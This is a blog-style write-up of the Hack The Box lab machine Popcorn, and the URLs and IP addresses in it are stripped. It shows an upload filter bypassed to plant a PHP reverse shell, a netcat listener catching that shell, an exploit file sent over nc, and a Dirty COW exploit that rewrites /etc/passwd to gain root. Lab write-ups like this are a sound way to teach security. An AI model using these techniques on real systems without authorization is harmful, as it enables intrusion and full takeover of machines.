HTB: Popcorn


This machine is Popcorn from Hack The Box


root@kali:~# nmap -sV -p- -T4
Starting Nmap 7.70 ( ) at 2019-09-27 14:08 EDT
Nmap scan report for
Host is up (0.037s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 124.15 seconds

The Box

Port 80 it is

Screenshot 1

I setup dirbuster

Screenshot 2

Screenshot 3

So off to

Screenshot 4

I tried registering

Screenshot 5

Screenshot 6

I then login and head over to upload where I tried to upload a php reverse shell

Screenshot 7

Screenshot 8

So I took a look at the renamer file from before

Screenshot 9

So maybe useful, but not right now. Next I tried uploading my shell as .torrent and using renamer to rename it to php. But this didn’t work either. So I moved onto

Screenshot 10

And the torrent host page allowed file upload for images, so I uploaded my shell as a jpeg

Screenshot 11

Screenshot 12

The page showed me it was located at, so I guessed it’s on disk position as


So I used the renamer to try and make it php again by going to

Screenshot 13

I opened a listener

root@kali:~# nc -nlvp 4444

And triggered the shell by going to

connect to [] from (UNKNOWN) [] 59902
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 22:43:33 up  2:24,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off

I then upgraded the shell

$ python -c "import pty;pty.spawn('/bin/bash')"

I found this box was vulnerable to dirty cow

www-data@popcorn:/var/www/torrent$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux

So I grabbed a copy from, checking if I had gcc on the machine

www-data@popcorn:/var/www/torrent$ cd /tmp
www-data@popcorn:/tmp$ which gcc

Then transferred and compiled the exploit

root@kali:~# nc -nlvp 5555 < cow.c

www-data@popcorn:/tmp$ nc 5555 > cow.c

www-data@popcorn:/tmp$ gcc cow.c -pthread -lcrypt -o cow

I then ran the exploit

www-data@popcorn:/tmp$ ./cow
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password

Complete line:

mmap: b77a8000

And ssh’d in as the modified root user

root@kali:~# ssh [email protected]
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686

To access official Ubuntu documentation, please visit:

  System information as of Fri Sep 27 22:58:21 EEST 2019

  System load: 2.03              Memory usage: 10%   Processes:       117
  Usage of /:  6.7% of 14.80GB   Swap usage:   0%    Users logged in: 0

  Graph this data and manage this system at

Last login: Sun Sep 24 18:01:48 2017

firefart@popcorn:~# id
uid=0(firefart) gid=0(root) groups=0(root)

And then grabbed the flags

firefart@popcorn:/home/george# cat user.txt

firefart@popcorn:~# cat root.txt

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.